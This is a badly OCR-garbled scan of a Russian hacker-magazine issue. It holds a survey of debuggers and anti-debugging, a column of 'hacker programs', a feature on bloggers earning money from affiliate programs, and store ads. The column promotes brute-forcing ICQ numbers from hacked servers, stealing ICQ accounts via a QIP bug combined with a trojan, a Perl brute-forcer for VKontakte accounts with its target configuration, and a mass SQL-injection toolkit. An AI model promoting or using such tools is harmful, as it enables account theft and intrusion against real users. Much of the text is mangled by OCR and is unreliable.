подопытного кода прямо «на месте» (щбі іп іЬе ріасе), без вы- 
хода из дизассемблера. Поддерживаются как графические, 
так и консольные режимы (в ІІЫІХ — только консоль). ЮА Рго 
— коммерческий продукт, причем большинство «варезных» 
версий, гуляющих в сети, работают крайне нестабильно и 
постоянно падают, поэтому имеетсмысл остановиться на 
бесплатной (и, естественно, нереальноурезанной) версии 



4 . 9 . 



0 МІСР050РТ ОЕВІІООЕР 6. 8. 4. 0 

Входит в состав ѴѴйК (ѴѴіпсіоѵѵб Огіѵег Кй — бывший Огіѵег 
Оеѵеіортепі: КМ; или ООК), а также в комплект ОеЬиддіпд 
Тооіб. Оба они бесплатны, но ѴѴОК намного больше по объему 
и требует предварительной регистрации для получения 
ѴѴіпсіоѵѵб І_іѵе Ю (проверка валидности ѴѴіпсіоѵѵб при этом не 
осуществляется), в то время как ОеЬиддіпд Тооіб раздается 
без регистрации вместе с 50К, в которую входит доку- 
ментация, заголовочные файлы, библиотеки и несколько 
примеров, как надо писать плагины. Ксожалению, сторонних 
плагинов под МісгобоЛ ОеЬиддегочень немного. 

Місгобоіі; ОеЬиддег может работать как на прикладном 
уровне (гіпд 3), так и на уровне ядра. Вплоть доХР ядерная 
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отладка требовала, как минимум, двух машин, соединенных > ІІІпкз ! 
СОМ-шнурком, но теперь достаточно и одной. ОІІу-ОеЬиддег 

Поставляется в двух редакциях: ѵѵіпсІЬд.ехе — графический ѵѵѵѵѵѵ.оІІусіЬд.сІе 
интерфейс и сбЬ.ехе — интерфейс командой строки. И та и 

другая являются лишьтонкими обертками вокругЬЬдепд.сШ, ША Рго 4.9 Ргееѵѵаге 

в которой, собственно, и реализован основной отладочный 

«движок», документированный протокол обмена. Поэтому, 

чтобы в очередной раз не писать трассер с нуля, ЬЬдепд.сШ. 5узег 

можно использовать в качестве «фундамента» при написании ѵѵѵѵѵѵ.БузегБо^.сот/ 

универсальных распаковщиков исполняемых файлов. ШѵѵШѳШ.ИІШІ 



VI .X 

Р 

.4 . . . .3 . _ .ѵ. Я. 

Ь Е... .кг. . . .. 



г БОРИСЕ 2.6.0 (ВШЮ 336) 

Легендарный отладчик ядерного уровня всех времен и 
народов. Работает в обход М5 ОеЬиддіпд АРІ, что значительно 
усложняет анти отладку, однако, учитывая, что для разработ- 
чиков защит 5оШСЕ — врагномер один, практически все про- 
текторы легко распознают его присутствие в системе. Поэтому 
никак не обойтись без специальных расширений (которые 
упомянем дальше). 

Названая версия не является последней, но она стабильна и 
хорошо совместима с хакерскими плагинами, «вгрызающими- 
ся» в отладчик без всякого АРІ (путем Ьіі-Ьаск’а). С более поз- 
дними версиями хакерские плагины несовместимы. С другой 
стороны, ЗоЛІСЕ поддерживает плагины, написанные для М5 
ОеЬиддег, а вотобратной совместимости, увы, не наблюдается. 
В настоящее время поддержка зо^-ісе прекращена и продукт 
похоронен. Он еще совместим сХР и 8егѵег2003 (хотя на 




Крис Касперски размышляетоб антиотладке на 64-битных 



СРВ 

Ыір://зои гееѵѵаге. 
о гд/деі Ь/сІ оѵѵп Іоа 6/ 




На нашем 0Ѵ0 ты 
найдешь полный 
комплект антиотла- 
дочного софта, кото- 
рый нам позволило 
выложить законода- 
тельство. 
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ІІППІОІ 

Уззвэн ие ЦНУННЯ 
позаимствовано из 
фантастического 
романа Уильяма 

тик>>.(УѴМі]'ат ^ііэ^оп : 
ш иготапбс»). 
Шроли льда там 

ные механизмы, 
ЩЩЩіЖМШШШ 
приходилось рубить, 
соответственно, 
ІІІІ^ВШіосл ов Д 
«мягкий лед» — это 
легкий хакинг. 



многоядерных процессорахуже наблюдаются серьезные 
проблемы), но в долгосрочной перспективе Зо^ІСЕ обречен и 
необходимо искать ему замену. Чем скорее, тем лучше! 

В БУБЕР 1.95.19000.0894 

Достойная альтернатива умирающему БоШСЕ. Ядерный 
отладчик, поддерживающий многопроцессорные машины и 
всю линейку ЫТ-подобных систем — по Висту включительно. 
Это коммерческий продукт, написанный двумя китайскими 
хакерами — ѴѴи УапРепд и СЬеп -ІипНао — предоставляющими 
всего лишь семидневный бесплатный триал. Оскорбительно 
мало, однако, поскольку я вливался в Бузегіеат.то расска- 
зывать отом, какломать его — не собираюсь (хотя ломается 
он легко). В настоящий момент готовится книжка «Техника 
отладки II» с полной версией Бузег’а на компакт диске, так 
что осталось лишь немного подождать, чтобы заполучить это 
чудо. 

Нас ждет графический интерфейс, к которому пона- 
чалу трудно привыкнуть, но в остальном — это все тот 
же самый БоНІСЕ, во всяком случае с точки зрения 
синтаксиса команд. Будучи в Іеат’е, я работаю над уси- 
лением обороноспособности этого отладчика (в смысле 
стойкости против антиотладки). Плюс разрабатывается 
возможность подключения внешних плагинов (правда, 




плагины для Бузег’а мне неизвестны, кроме пары штук, 
написанных им самим в порядке эксперимента). 

Н 6РВ6.1 

бЫИ Бебиддег — основной отладчик под ІІЫІХ, ориентирован- 
ный на совершенно инойтип мышления, чем все вышепере- 
численные отладчики. Это не просто интерактивный отладчик, 
скорее это станокс программнымуправлением, гибким и 
мощным интерфейсом. Отлаживать с его помощью «честные» 
программы — одно удовольствие, но в плане антиотладки 
дела обстоят плохо. ОЭВ даже не пытается сопротивляться и 
работает через библиотеку рігасе (которая на самом деле ника- 
кая не библиотека, а системный вызов). ОйВ принципиально 
неспособен отлаживать программы, которые не хотят, чтобы их 
отлаживали. А та кие программы мало-помалу начинают появ- 
ляться (взять хотя бы упаковщик исполняемых файлов отБЬіѵа). 
Версия 6.1 собрана в 2004 годуй к новым билдам, очевидно, 
не относится. Нотаккакосновной беЬид епдіпе реализован 
не в 60В, а сосредоточен в ядре системы, то номер версии 
решающего значения не имеет. 

Естественно, помимо ОйВ существуют и другие отладчики, 
например, Ыпісе, но поскольку антиотладочныетехнологии 
под У N IX только-только начинают развиваться, для наших 
экспериментов вполне сгодиться и 60В. И-И 



«С1\ПЭ БеЪи^ег Д< И‘ІН~Р 



остоинте 



отладчик, скорее это станок 



с программным управле- 



нием, гибким и мощным 



инте 



тлаживать 



с его помощью «честные» 
Программы -Д> ЫіЫ*і і Ы:Мі1Д 

но в плане антиот- 
ладки дела обстоят плохо» 
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Программы для хакеров 



ПРОГРАММА: 2ВК1ЛЕ 
ОС: УІГЧ/*ГЧІХ 
АВТОР: 2АВОХЫК 




Угоняем уины 



В прошлых номерах на страницах рубрики я актив- 
но освещал тему восстановления (читай — брута) 
пассов отмыльников на различных таіі-серви- 
сах. Что ж, настала очередь плотненько заняться 
красивыми уинами. Вопрос заключается лишь в 
выборе подходящего софта. Со времен ІРОЬгиІе 
утекло много воды, поэтому использовать отныне 
мы будем тулзу от2абохІік'а — 2Ьгіке. Сразу скажу, 
что самаутила включает в себя три модификации: 



1. Консольная МіпЗ 2 -версия 

2. Ш_пЗ 2 -версия с (3111 
3 . Версия под *піх 



Однако список команд и возможностей 2ЬпЛе 
независитотвыбраннойтобой платформы и 
приведен ниже: 



раизе — приостановить брут 
сопбіпие — продолжить приостановлен- 
ный брут 

біпізЬ — завершить работу програм- 
мы (предварительно будет выполнен 
сіеапир) 

бЪгеабз ххх — сменить количество по- 
токов на ххх 

сіеапир ргохіез — обновить прокси 
листы (даже если в настройках не за- 
дан сіеапир прокси листов) 
сіеапир аіі — обновить все листы 
(если в настройках не отмечен сіеапир 
прокси листов, то они останутся не- 
тронутыми) . 



Особенно удобно юзать тулзу на ломаных серверах 
посредством удаленного терминала. Дело втом, 



что софтинка поддерживаетудаленную консоль. 
Послеуказания порта и пароля в конфигеутилы 
ты запросто можешь приобщить чужой дедик к 
такому полезному занятию, как брут. Кроме того, 
при подобном использовании тулзы тебе стано- 
вится доступным ряд новых команд, существенно 
облегчающих процесс анализа лога перебора: 



зЪсж дообз — показать валидные пары 
ісд:раззж>гбз 

в баб з — просмотреть на экране стати- 
стику брута 

ехіб — завершить сеанс связи с уда- 
ленным 2Ьгибе 

Ъеір — хелп ака вывести список под- 
держиваемых команд. 



Передача параметров утиле происходитлибо 
вручную, либо через конфиг, пример которого 
ты найдешь на нашем диске. Чтобы заюзать 
собственный конфиг, необходимо указать тулзе 
соответствующий флаг«-о»: 



# ./гЬгибе.ехе -о /сопб/зеббіпдз . бхб 



В качестве генератора пассворд-листов в ком- 
плекте к софти не идетскрипт^Развбеп. Именно 
им рекомендуется генерить всевозможные типы 
листов с пассами: начиная отзаданного диа- 
пазона уинов и заканчивая пассворд-листами, 
ориентированными на несколько конкретных но- 
меров. Запускать скрипт необходимо следующим 
образом: 



<рЬр_:Ео1бег>/рЪ.р <2разздеп> 
<оибриббі1е> <орбіопз> 



Где в качестве опций (<орбопз>) тебе потребуется 
указать на выбор: 



— б х-у — все уины диапазона от х до у 
(например: -6 100000-999999) 

— і ісд — номерки вида ісді , ісд2 , ісдЗ 
(без пробела) 

— а х-у — все числовые пароли от х до 
у (например: — а 1000-500000 ) 

— з бііе — файл с паролями. Формат 
записей типа: 



раззжіі 

раззмб2 

раззжІЗ 

— р разз — пароли вида 

разз ,разз2 ,раззЗ (без пробела) . 



В общем, 2Раз5беп отлично справляется 
с возложенными на него обязанностями. 
Однако стоит сказать и о самом брутере. Кроме 
перечисленных консольных версий под Винду 
и никсы, существует ѴѴіп32-версия с гуишным 
интерфейсом, которая носит гордое название 
ѴѴ2ЬгиІе. Тулза унаследовала лучшие качества 
от своих консольных братьев, включая под- 
держку Ыір-прокси и работу через зоскз-сер- 
веры. 

Одним словом, тулза занимает достойное место 
среди повседневного хак-софта! Надеемся, 
что 2ас1охІік еще не раз порадует нас новыми 
релизами. 

ПРОГРАММА: ОІР РА55Ѵ0К& РЕСАШІЧС 
ОС: ѴІЫ00Ѵ5 2000/ХР 
АВТОР: КРЕАМОР & 1315 





р— ■ 1 - ч о 
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М* 1 







Выдергиваем пассы из ОІР’а 

Если в случае с 2Ьш1е все предельно ясно (запус- 
тил и брутишь),то с ОІР РаззѵѵогсІ РесаШпддело 
обстоит куда сложнее. На первый взгляд может 
показаться, что тулза — очередное продолжение 
темы с перебором паролей, но это далеко не 
так. Многие из нас любятуказывать пасс куину, 
сохраняя его в клиенте. Действительно, вбил и 
забыл. Воттолько беда не приходит одна: после 
очередного слета Винды/глюка винчестера/еію 
мы частенько обнаруживаем, что не помним 
пароля ксобственному номерку. Что, знакомая 
ситуевина?Один мой товарищтоже долго рвал на 
себе волосы, когда подобным образом просохатил 
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красивый 5-знак. И менно тогда мне и довелось 
увидеть утилу 01 Р РазвѵѵогсІ РесаШпд, которая 
восстанавливает ранееуказанные пароли в СНР’е. 
Я сейчас не буду вдаваться в технические под- 
робности реализации тулзы (об этом ты можешь 
подробно расспросить человека под загадочным 
ником Креатор), скажулишь, что принцип дейст- 
вия основан на баге, обнаруженной в следующих 
версиях популярного клиента 01 Р: 7981 , 7990, 
7995, 7997, 7998, 8000, 8010, 8020. После запуска 
софтины оттебя требуется произвести буквально 
пару манипуляций: 



1) Запустить СНР 

2) Выбрать номер, от которого ты за- 
был пароль 

3 ) Нажать баттон «Подключиться» 

4) Перейти обратно к нашей программе 
<2ІР Равзтлгогсі Песаіііпд и надавить на 
кнопку "Найти. . . " 

5 ) Получить пароль : ) 



Согласись, метод получения пассов кзабытымуи- 
нам совсем не сложен. Однако, это не единствен- 
ный способ эксплуатации 01 Р РазвѵѵогсІ РесаШпд. 
Наверняка, в ходе чтения описания тулзы твою 
светлую голову уже посетили мысли о возможном 
ее применении для «заимствования» ІСО-аккаун- 
тов с чужих компов. Идея вполне работоспособна, 
особенно если использовать технологию кражи 
пассов в совокупности с каким-нибудь троем — но 
это уже, как говорится, совсем другая история. 

ПРОГРАММА: ѴКОМТАКТЕ ВРШТОЕСЕ 
ОС: ѴІГЧ/*ГЧІХ 
АВТОР: С!КІ_ОООІ_ 




Сорец брутера для ѵѵѵѵѵѵ.ѵкопіакіе.ги 



Какты уже заметил, публикация брутеров под 
различные популярные веб-сервисы давно стала 
традицией, поэтому не будем нарушать ее и на этот 
раз. Только заморачиваться с мыльниками в наши 
дни стало не модно, чего не скажешь о ресурсе 
ѵѵѵѵѵѵ.ѵкопШкШ.ги. Именно им мы и займемся, а 
точнее — восстановлением «забытых» паролей 
от нужных аккаунтов. Естественно, вспоминать 
мы будем исключительно свои пассы, ни о каком 
взломе и краже акков/личной информации речи 
не идет (и вообще, где мой адвокат?). Посему, 
представляютвоему вниманиютулзу, способ- 
ную выполнять многопоточный брут паролей от 
ѵѵѵѵѵѵ.ѵкопШкШ.ги — ѵкопШкШ Ьгибюгсе. Утила 
полностью реализована на Регі и представляет 
из себя шустрый в работе скрипт. Перед началом 
«воспоминаний» необходимо передать тулзе 
требуемые параметры: 



################################## 

#### 

# СІкІобоЬ 



# ѵкопбакбе.ги Ьгибебогсе мібЬ. 
тиІбі-бЬгеасіз 

################################## 

#### 

$(3іс = 'раззі.бхб' ; # словарь паролей 
$іб = 111111; # іб цели 
$шаі1 = 'шаі1%40шаі1 . сот' ; # мыло, 
вместо @ вписать %40 
$бЬгеасіз = 4 ; # количество потоков 
################################## 
#### 



Как видишь, все достаточно просто. Указываешь 
пассворд-лист, вбиваешь ісі цели и соответст- 
вующий мыльник (заменяя, при этом, знак«0» на 
«%40»), устанавливаешь количество потоков и 
вперед. Дополнительные комментарии считаю из- 
лишними, так что приятных тебе «воспоминаний». 

Р.5. Да, чуть не забыл, все вышеописанное рас- 
сматривай исключительно с теоретической точки 
зрения, ѵѵѵѵѵѵ.ѵкопіакіе.ги — ру-ресурс, последст- 
вия, сам понимаешь, могутбыть необратимы. 

программа: мѵзді.-іми тоошт 

ОС: УШ/*ІЧІХ 
АВТОР: РІШТ 




Му5С1І_-іп] Тооікіі: собственной персоной 



Тема реализаций 50І_-инъекций обсуждалась на 
страницах журнала не единожды, тем не менее, 
я вынужден затронуть ее вновь. Рассматривать 
единичные случаи проведения атаки мы не будем, 
вместо этого займемся глобальным парсингом 
уязвимых движков. Как известно, Гугл —твой 
лучший друг, но ведь искать бажные сценарии 
вручную долго, нудно и гиморно. Поэтому пред- 
лагаю тебе использовать специально созданный 
набор для парсинга скул-баг— МуВОб-іпі Шоікіб 
Софтина представляет мощный инструмент по 
обнаружению всевозможныхтипов зді-инъек- 
ций, реализованный на РНР Основной комплект 
включает в себя: 



1 . Скрипт подбора количества выводи- 
мых колонок 

2 . Скрипт подбора таблиц из файла 
(для МуЗОЬ 4.x) 

3 . Скрипт вывода полной структуры БД 
( для Му ЗОБ 5.x) 

4 . Скрипт для автоматизированного 
поиска Му5<2Ь-іпдесбіоп через зеагсЬ. 
ісс[ . сот 

5 . Скрипт с набором утилит для кон- 
верта кодировок (азсіі<->1іех, шб5 , 
Ьазеб4 епс обе /бе с обе, ебс) 



б. Скрипт для работы с Ыіпб зді іпд 
(то есть для работы со «слепыми» зді- 
инъекциями) . 



Краткий перечень функционала ты можешь 
наблюдать ниже: 



— Возможность выборочного дампа таб- 
лиц в файл 

— Вывод изег() , ѵегзіопО , 
бабаЬазе ( ) перед списком таблиц в 
баЫе5 .рЬр 

— Скрипт со1ипшз_ашоипб .рЬр ведет 
подбор, начиная с одной колонки 

— Названия таблиц находятся в файле 
баЫез . бхб 

— Сохранение вводимого урла в 
іприб ' ах 

— Возможность указания произвольно- 
го максимального количества полей в 
со1штз_атошіб . рЬр 

— Таймаут для сигі ' а . 



Уверен, данный продукт не оставитравнодушным 
даже тебя, ибо он является полностью бесплат- 
ным и распространяется в сорцах. 



ПРОГРАММА: МНББ 
ОС: УІМБ0У5 2000/ХР 




К сожалению, ничто в этом мире не вечно, а тем 
более, твой любимый винчестер. Преждевремен- 
ный скрежет, некорректная работа ОС и прочие 
признаки даютпонять: все, прощай, винт, а 
вместе сними гигабайты инфы. Однако полезная 
железка может проработать еще некоторое время, 
если ее как следует почистить с помочью утилы 
МЕЮО, которую я и хочу предложить тебе взять на 
вооружение. С момента своего появления на свет 
тулза достаточно сильно прогрессировала и те- 
перь предоставляется в виде утилы для создания 
загрузочной дискетки. Чтобы у тебя не возникло 
лишних вопросов, давай рассмотрим план наших 
действий по порядку: 



1 . Запускаем утилу МНББ 

2 . Вставляем в флопик дискету 

3 . Нажимаем на баттон «Сгеабе» в МНББ 
4. Забираем готовую загрузочную дис- 
кетку . 



После вышеизложенных мероприятий ребутимся 
и грузимся с нашей дискетки. Выбираем нужный 
нам девайс в качестве винчестера (поддерживает 
ЮЕ/5АТА) и указываем необходимые процедуры. 
Тулза умеет делать посекторную проверку поверх- 
ности диска, а также посекторную перезапись, что 
особенно эффективно при уничтожении инфор- 
мации с винта. В общем, как использовать утилу и 
в каких целях — решать тебе. тг 
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■ИНТЕРНЕТ 










ИСТОРИЯ ЛЮДЕЙ, сумевшихзаработать 
НА КВАРТИРУ В ИНТЕРНЕТЕ^ 




-У них не было ни квартиры, ни машины. 

[У них не было фактически ничего, кроме 
^фанатичной уверенности в том, что они смо- 
гут заработать в интернете. И вот, несмотря 
на насмешки и скепсис, некоторые из них 
живут в собственных апартаментах, а дру- 
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Первый пост в блоге Московского бомжа привнес свежее дыхание во всю 
сферу е-бизнеса 



лог Шр://ИотеІе55Іпто5соѵѵ.Ыод5роі.сот , 

первая запись отОб марта 2006 года: 

«Цель этого блога показать, реально ли приоб- 
рести квартиру в Москве практически с нуля за 1 0 месяцев, а 
точнее до нового 2007 года». 

Этого человека зовут Александр. Он живет в Москве и 
работает на обычной работе с зарплатой $600 в месяц (плюс 
$50-200 премиальных). Вдобавокон занимается поиско- 
вой оптимизацией для двух сайтов, прося за свои услуги 
довольно смешные деньги ($250), и параллельно развивает 
несколько проектов, которые, благодаря рекламе Ооодіе 
АсІЗепве, приносятему около $1000 в месяц. В общей слож- 
ности получается примерно $2000, что в принципе неплохо, 
даже по московским меркам, нотолько не втом случае, если 
ты решил зарабатывать на квартиру. Именно такое решение 
принял Александр. И с того дня стал делиться с читателя- 
ми блога «Московский бомж» сведениями о своих делах, 
проектах и их финансовой успешности. На информацию не 
скупился, рассказывал о личном опыте, раскрывал секреты, 
реально помогающиетем, кто до этого момента был крайне 
далек от заработка в инете. Неудивительно, что число 
читателей росло как на дрожжах, а в Сети стали возникать 
блоги последователей и подражателей: сначала «Киевский 
бомж» , потом «Кишиневский». Александр (Московский 
бомж) фактически стал первооткрывателем, а многие его 
действия превратились в традицию движения, без выпол- 
нения которых человеку проблематично приобрести статус 
интернет-бомжа. 




В КТО ТАКОЙ БОМЖ? 

Интер нет- бомж — это не просто человек, который хочетза- 
работать в интернете и повсеместно трубит об этом. С самого 
начала формировалась своего рода идеология интернет-бом- 
жей. Итак, каждый интернет-бомждолжен: 

• Завести блог на ЫодвроЕсот. Именно эта площадка поль- 
зуется наибольшей популярностью среди интернет-бомжей. 
Правда, позже некоторые из них все-таки переезжают на 
віапсіаіопе-блог с доменом второго уровня, то есть покупают 
хостинг, устанавливают движок и ведут свои записи уже там. 

• Поставить цель. Как правило, в качестве цели выбирается 
заработок на что-то почти недосягаемое, как квартира в 
Москве или дорогостоящая машина. Не выполнить ее, как 
показывает практика, вовсе не означает поражение. Важно, 
что столь сложная задача является отличным инструментом 
повышения мотивации. 

• Делиться опытом. Большинство интер нет- бомжей регуляр- 
но рассказываютотом, какони зарабатываютсвоитысячи 
долларов. Поступаятак, они нетолько помогаютеще неопыт- 
ным читателям и повышаютсвой авторитет в тусовке, но еще и 
привлекаютлюдей (рефераллов) к партнерским программам, 
за что получаютсвой процент. 

• Танцевать финансовый стриптиз. Ежемесячный посто 
доходах (и часто — расходах), с рассказом, какая из партнерс- 
ких программ или сервисов принесла деньги — это, пожалуй, 
самый лакомый кусочек, которого с нетерпением ждуттысячи 
читателей. 

Несмотря нато, что сам Московский бомж относится ксвоей 
деятельности очень скромно, говоря, что он просто делает 
сайты и пытается на них заработать, это не помешало ему 




мпавіег-х.сот — твой гид по а б и И: -тематике 




> Ііпкз 

Ьотеіеззіпкіеѵ. 
ЫодзроЕсот — киев- 



ИотеІе55Іпто5со\л/. 



Ыодзроі.сот — мос- 



ковский бомж 



ИотеІе55ІпІ2Ьеѵ5к. 



ЫодБроІ.сот 



— ижевский бомж 



ЬотеІеззіпзрЬ. 
ЫодзроЕсот — пи- 
терский бомж 



ЬотеІеззіпхарЬкоЬ. 



ЫрдэроЕсот — харь- 
КОВСКИЙ бомж 



ЬотеІеззіпсЫзіпаи. 



ЫодзроЕсот — ки- 
шиневский бомж 




«ЯЦіІІЫІІІЦЦ 



величивает срок получения желаемой отдачи, но 



и затраты сводятся к нулю. 
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Главной кузницей знаний по 5Е0, безусловно, является проект 
зеагсЬепдіпез.ги 




На сайте ЬНр:/Ліп5І:гір.ЬІ2ты сможешь посмотреть профессиональный 
финансовый стриптиз от интернет-бомжей и манимейкеров со всехуголков 
нашей родины 



> ѵѵагпіпд 

Один из немало- 
важных вопросов в 
деятельности интер- 
нет-бомжей: «Стоит 
ли платить налоги?» 
Спрашивали — от- 
вечаем! На связи 
профессиональный 
юрист Александр 
Григорьев: «Если 
Вы не оформлены 
документально на 
работус партнерской 
программой.то Вы, 
каклицо, получаю- 
щее доход, обязаны 
заплатить налоги». 



уже в ноябре 2007 года перепрыгнуть планку накоплений в 
один миллион рублей. И пусть покупка квартиры временно 
откладывается, он смог сделать гораздо больше, чем кажется 
на первый взгляд, а именно доказать, что большие деньги в 
интернете доступны всем и каждому. 

г МОЖЕТ БЫТЬ, ПОПРОБУЕМ? 

Когда еще бы ты захотел стать бомжем? Да никогда! А вот в 
интернете — запросто. Если утебя есть огромное желание 



зарабатывать и Ю выше комнатной температуры, то почему 
бы не попробовать? Один из вопросов, который волнует 
абсолютно всех новичков: сколько нужно денег, чтобы начать? 
Давайте оставим все гадания передаче «Битва экстрасенсов» 
и послушаем мнение одной из самых перспективной в этой 
сфере личности — Нижегородского бомжа: 

«По сути, чтобы зарабатывать в интернете, нужно всего лишь 
желание и сам интернет. Лично я не вложил в этот бизнес ни 



«Новичку я могу порекомендовать продавать казуаль- 



ные игры, например, через (аатеьозз или западный 



іташяівЕштаііі 



отомучто это нет 






тую партнерские программы, связанные с азартными 



играми, ставками — тут лучше за 



но и на русских можно зараоотать» 






РгоШе: 

Дмитрий Давыдов 

Этот человек не относится к семье бомжей. Автор и ведущий блога 
«Маркетинг в маленьком городе» І сІаѵусІоѵ.ЫодБРОІ.сот ) в 16 лет 
уехал школьником по обмену в США и застрял там на шесть лет. За 
это время Дима получил высшее микробиологическое образование и 
стал работать в научной лаборатории. В 2001 году вернулся в Россию. 
Начал помогать российским шароварщикам сначала переводами, а 
затем и продвижением их продуктов на западные рынки. С удивле- 
нием обнаружил, что в России есть несколько тысяч людей, которые 
зарабатывают в интернете приличные деньги. После чего принял 
решение открыть с напарником собственный шароварный-дискаун- 
тер [ ѵѵѵѵѵѵ.сіергісе.сот ]. Потом появились и другие проекты по разным 
направлениям, типа РіскуОотаіпз.сот. В последнее время Дмитрий 
переключился на аффилиатные проекты. Главная мечта: ктридцатиле- 
тию воплотить идею, которая принесла бы миллионный доход. 



РгоШе: Киевский 
бомж 

В отличие от Московского бомжа, имевшего хороший постоянный зарабо- 
ток, судьба Киевского бомжа складывалась иначе. В сентябре 2006 года 
переехав в Киев, он внезапно потерял доступ кфинансовым потокам: ста- 
рой работе, прежним клиентам и заказам. В итоге оказался без прописки 
и средств к существованию, а заодно и возможности вернуться обратно 
в родной город. Воттогда-то он и решил, что должен за десять месяцев 
заработать на «двушку» в панельном доме с видом на Днепр, занимаясь 
исключительно менеджментом интернет контента или, какэто принято 
называть, 5Е0! Доходы за первый месяц были далеки от фантастических: 
$40 на АбБепзе и еще около $200 на всяких подработках. Баланс был 
строго в минусе. Надо сказать, расклад не сильно отличался от начинаний 
других бомжей. Ноуже через пару месяцев новоиспеченному киевлянину 
удалось заработать $932 (на рекламе АбЗепае, разработке сайта, хостинге 
и поисковой оптимизации), и доходы продолжали расти. Почему я расска- 
зываю о Киевском бомже? Потому что ровно через 10 месяцев он добился 
поставленной цели, купив квартиру! Этом, сколько усилий пришлось при- 
ложить и на какие жертвы пришлось пойти, можно прочитать в архивах на 
его официальном сайте ( ЬотеІеББІпкіеѵ.ЫодзроЕсот ]. 
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Требуются курьеры! Достойные условия. 
Классный молодой коллектив. 

Звоните: +7 (495) 780 88 25 
или пишите: заіез® датерозі.ги 



© Телефон: 

( 495 ) 780-8825 

шшѵ.датерові.ги 



I САМ Р05Т 



Все цены действительны на момент публикации рекламы 




т 

ІМіпІепсІо ѴѴіі 

9984 в. 




НЕ СКУЧАЙ! 

ДОМА И 
В ДОРОГЕ 

ИГРАЙ! 

Покупку можно оплатить 
электронными деньгами 



РІауЗТаііоп 2 ЗІіт 

5200 р. 



ХЬох 360 ЕІіІе (120 ев) 

17680 р. 







РІауЗІаІіоп 3 (406Ь) Р5Р ЗІіт & ІЛе 

15990 р. 7800 р. 



Возможность доставки 
в день заказа 



Специальная цена на прис- 
тавки при покупке 3-х игр 




Аезэзкіп'з СгеесІ (РАС) т 0 т сіапсу’з СІіозІ Весоп ВезШепІ ЕѵіІ 4 НпаІ Рапіазу XII 
русская инструкция Асіѵапсесі ѴѴагІідІтІег 2 (РАЦ (РІаСіпит) 

2028 р. 2028 р. 1092 р. 1560 р. 



Лапсіпд 81аде 
Зиретоѵа 
1170 р. 



ВезМепІ ЕѵіІ: ТІіе 
ІІтЬгеІІа СІігопісІез 
1820 р. 1924 р. 



Ваутап Ваѵіпд 
ВаЫзіОз 2 



ІІпгеаІ Тоигпа- Виііаг Него III: ЬедепЛз о( Вое 
тепі III (115) ВипсЛе (бате & ѴѴігеІезз биііаг) 
2080 р. 2600 р. 









цента, но за восемь месяцев довольно неплохо поднялся, и мои доходы 
продолжают расти. Дело втом, что на начальном этапе можно использо- 
вать бесплатныехостинги, доменные имена третьего уровня и развивать 
все самостоятельно с помощью поисковой оптимизации - это, конечно, 
увеличивает срок получения желаемой отдачи, но и затраты сводятся к 
нулю». 

Однако глупо надеяться, что все начнет получаться с первого дня. Новичков 
ждет масса ошибок, избежать которых подчас невозможно. Но, по большому 
счету, никаких секретов тут нет. В чем секрет акробатов или шпагоглотате- 
лей? Просто несколько сот дней практики! Значититебе нужно настроиться 
на тяжелую кропотливую работу, отдачу от которой ты сможешь почувс- 
твовать лишь через несколько месяцев. А пока нам стоит сделать первый 
шажок по дороге в прекрасное будущее, который будет заключаться в выборе 
подходящей партнерской программы. 

Наиболее выгодные финансовыеусловия предлагаютзападные партнерс- 
кие системы, но работать с ними не всегда удобно. И вот почему: 

• Языковой барьер. Если твои знания английского на уровне «дую спук 
инглиш?», то общение с администрацией, чтение правил и форумов будет 
весьма проблематично. Это, конечно, создаст дискомфорт при работе с 
системой и обернется потерей драгоценного времени. Время, как известно 
— деньги. 

• Выплаты. Даже если партнерская программа тебя устраивает на все 
100%, неторопись подключаться к ней! Многие зарубежные системы 
делают выплаты через сервисы, которые трудно или почти невозможно 
обналичить в России и странах СНГ. 

Выходом из ситуации может стать письмо с просьбой ввести поддержку 
альтернативной системы — обычно администрация охотно идет навстречу 
пользователям. 

Как я и говорил, успех бомжей заключается втом, что они активно делятся 
опытом со своими читателями, а иногда даже дела ют подарки в виде цен- 
ныхсюжетов или специализированного софта — какправило, самописного, 
который, естественно, просто так в интернете не скачаешь. Поэтому, заин- 
тересовавшись выбором партнерской программы, не поленись проштуди- 
роватьархивы постов. Уверяютебя: найдешь массу полезной информации 
и быстро въедешь в тему. Вот лишь пример такого поста (опытом делится 
товарищ Маиіпеі): 

«Новичку я могу порекомендовать продавать казуальные игры, напри- 
мер, через ЗатеВозз или западный аналог. Почему? Потому что это 
нетрудно. Также советую партнерские программы, связанные с азартны- 
ми играми, ставками -тут лучше зарубежные, конечно, но и на русских 
можно заработать». 

Перечислим главные моменты, на которые обращают внимание интернет- 
бомжи при выборе системы: 

• Наличие промо-материалов. Если они есть — вопрос о подборе контента 



будет решен автоматически и тебе останется всего лишь раскрутить сайт. 

• Возрастпрограммы. Старикам, как водится, почетиуважение, даже если 
речь идет о сервисе в интернете. 

• Оперативная поддержка. Перед началом работы рекомендуется потестить 
службу поддержки — в будущем это сохранит тебе немало нервных клеток. 

• П ол ожител ьн ы е отз ы в ы . А е щё л у ч ш е , есл и отз ы в ы будут от а вто р итетн ы х 
людей, ведьтогда они послужат гарантом качества и надежности системы. 
И, конечно же, не стоит забывать про основные ресурсы, где можно 
получить подробную информацию о ведущих программах и оперативную 
помощь по накипевшим вопросам: ѵѵѵѵѵѵ.тазіег-х.сот . 
ѵѵѵѵѵѵ.зеагсііепдіпез.ги . 

г МЕЖДУ СТРОЧЕК 

С каждым днем в России появляется всё больше людей, которые мечтают 
начать карьеру интернет — бомжа и ради своей идеи готовы бросить 
даже постоянную работу. Как ни прискорбно, но в нашей стране пока 
трудно получать достойную зарплату, горбатясь «на дядю». 
Неудивительно, что многие хотят работать на себя. И в этом плане интер- 
нет — это чрезвычайно перспективная область. Чего стоиттотже боодіе, 
который всего за несколько летсмогстать многомиллиардной компанией 
и дал возможность людям со всего мира зарабатывать тысячи долларов с 
помощью своих сервисов, ц-ц 



РгоШе: 

Кишиневский бомж 

Пять лет назаду этого человека была зарплата $50 в месяц. Еще год 
назад — всего $400, но именнотогда ему удалось продать свой первый 
товар на Атагоп.сот. Под действием невероятной эйфории закипе- 
ла бурная деятельность: эксперименты с иглах, дорвеи, партнерская 
продажа музыки, АсіЭепзе, магазины с таблетками ит.д., ит.п. В итоге за 
прошлый год получились весьма неплохие результаты: 

ІІтах — 17500 
трЗ — 5300 
атаіоп — 2500 
доодіе — 1060 + 540 
діаѵтесі — 500 
кіікѵір — 470 
заре — 350 
щеЬискв — 60 
рот — 30 
Виджеты — 50 

Итого получилось $28400 в год плюс $5000 основной зарплаты в инете в 
качестве дизайнера. Все подробности отом, какэто получилось, ищи в 
